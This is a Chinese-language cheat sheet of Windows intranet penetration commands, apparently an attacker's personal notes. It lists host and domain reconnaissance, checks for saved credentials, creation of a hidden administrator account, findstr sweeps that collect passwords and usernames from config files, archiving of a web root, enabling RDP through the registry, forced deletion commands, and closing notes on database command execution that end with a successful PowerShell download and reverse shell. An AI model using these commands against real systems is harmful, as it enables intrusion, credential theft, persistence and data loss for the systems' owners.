内网渗透命令
0x01 常用命令
hostname #主机名
systeminfo #系统信息(所在域,开机时间,安装信息,补丁情况,系统版本)
set #环境变量
net user #查看默认用户
net view #显示当前域或工作组中计算机的列表
net localgroup #查看用户组
net localgroup Administrators #查看 Administrators 组所有用户(包括隐藏用户)
query user #查看当前会话(window7 64 以上)
tasklist /v #显示当前进程和进程用户
net config workstation #查看当前登陆用户信息
net statistics workstation #查看主机开机时间
net share #查看共享文件夹
0x02 不常用的命令
whoami /all 查看 Mandatory Label 看我们是否过 uac
net session 查看有没有远程连过来的 session
cmdkey /l 看是否保存了登陆凭证.(凭据管理器)
echo %logonserver% 查看登陆域
net stitastics server 查看登陆时间
Wmic 能让攻击者大量利用来获取系统信息的系统自带工具
wmic qfe list #获取补丁信息
Netsh 做端口转发
spn –l administrator 域内查某个用户 spn 记录
dsquery | nltest 域内信息收集
自己收集的
0x01 常见的
taskkill /f /im cmd.exe #结束 cmd.exe
netstat -ano | find "14147" #查找 pid 为 14147 的进程
netstat -ano | findstr "1444" #查找占用 1444 端口的程序
net user test abcd1234 /add #添加用户名为 test 密码为 abcd1234 的用户
net localgroup Administrators test /add #将用户添加进管理组
query user #查看在线用户
logoff id #注销用户
rd/s/q #盘符:\某个文件夹 (强制删除文件文件夹和文件夹内所有文件)
del/f/s/q #盘符:\文件名 (强制删除文件,文件名必须加文件后缀名)
0x02 文件查找
dir c:\windows\system32\*.dll | find "res" #查找指定目录 c:\windows\system32\下所有含有 res 文件名的 dll 文件
WHERE /R c:\windows \*.exe #查找指定目录 c:\windows 下所有的 exe 文件
wmic process get name,executablepath #查看程序安装目录
dir /b /s config._ auth._ login\* _.bak _.config _.ini >> info.txt
findstr /si login _.xml _.aspx _.php _.py _.jsp _.asp _.action _.do _.ini _.txt _.cgi >> info.txt
findstr /si user _.xml _.aspx _.php _.py _.jsp _.asp _.action _.do _.ini _.txt _.cgi >> info.txt
findstr /si pass _.xml _.aspx _.php _.py _.jsp _.asp _.action _.do _.ini _.txt _.cgi >> info.txt
findstr /si username _.xml _.aspx _.php _.py _.jsp _.asp _.action _.do _.ini _.txt _.cgi >> info.txt
findstr /si password _.xml _.aspx _.php _.py _.jsp _.asp _.action _.do _.ini _.txt _.cgi >> info.txt
0x03 文件打包
c:\progra~1\winrar\rar.exe a -r D:\WebRoot\1.rar D:\Tomcat 9.0\web\ #将 D:\Tomcat 9.0\web\目录下的所有文件打包为 1.rar
fsutil volume diskfree d: #查看 D 盘使用情况:第一行-->可用字节数,第二行-->字节总数,第三行-->未用
0x04 开启 3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f #开启端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber #查端口
0x05 net view 命令 6118 报错
环境:win 2008 x64
sc config Browser start= demand #等于号后面是有一个空格的,这很重要
sc start Browser #启动服务
0x06 数据库命令执行
①、分区数目:wmic diskdrive get partitions /value,只有一个分区,
②、系统盘符:cd,系统盘符是 C:
③、寻找网站路径:c: & dir /s/b logo.png
④、查看是否站库分离:select host_name()、select @@servername 结果一致,没有站库分离。
⑤、IIS 默认的网站目录是 C:\Inetpub\wwwroot,看了一下~~~没有什么东西,应该是管理员重新配置了。
⑥、bitsadmin 文件下载,提示 Unable to add file to job - 0x800704dd,说不能联网,感觉是当前账号权限过低~~~
⑦、powershell 文件下载,成功反弹